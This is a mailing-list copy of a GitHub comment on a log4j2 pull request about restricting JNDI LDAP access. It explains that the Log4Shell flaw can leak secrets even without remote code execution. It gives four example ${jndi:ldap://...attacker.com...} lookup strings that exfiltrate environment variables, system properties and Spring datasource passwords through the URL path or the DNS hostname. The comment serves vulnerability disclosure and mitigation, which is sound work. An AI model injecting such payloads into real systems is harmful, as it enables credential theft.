You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/10 22:47:32 UTC
[GitHub] [logging-log4j2] ahahu commented on pull request #608: Restrict LDAP access via JNDI
ahahu commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-991354707
I'd also like to stress, that it is not sufficient to mitigate this vulnerability by using a JRE/JDK version which prevents the RCE, nor should you rely solely on your firewalls dropping outgoing TCP traffic.
The reason is, that the vulnerability also has the potential for leaking sensitive information via the LDAP request or via DNS.
Variable substition in the payload can be nested and one can use the "sys", "env" or "bundle" keywords to access sensitive data, which than is either used in the LDAP URL path or in the hostname.
Example for exfiltrating an environment variable containing a password used in the URL path
`${jndi:ldap://www.attacker.com:1389/${env:MYSQL_PASSWORD}`
This could be resolved to ldap://www.attacker.com:1389/mysecretpassword for example.
Example for exfiltrating an environment variable containing a password in the hostname part:
`${jndi:ldap://${env:MYSQL_PASSWORD}.attacker.com:1389/a}`
This could be resolved to ldap://mysecretpassword.attacker.com:1389/a for example
Of course this will fail if certain special characters are used in the password.
Example for exfiltrating the property "spring.datasource.password" from the application.properties file of a spring boot application:
`${jndi:ldap://${bundle:application:spring.datasource.password}.attacker.com:1389/a}`
Example for exfiltrating a system property that was passed through command line:
`${jndi:ldap://${sys:db.password}.attacker.com:1389/a}`
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: notifications-unsubscribe@logging.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org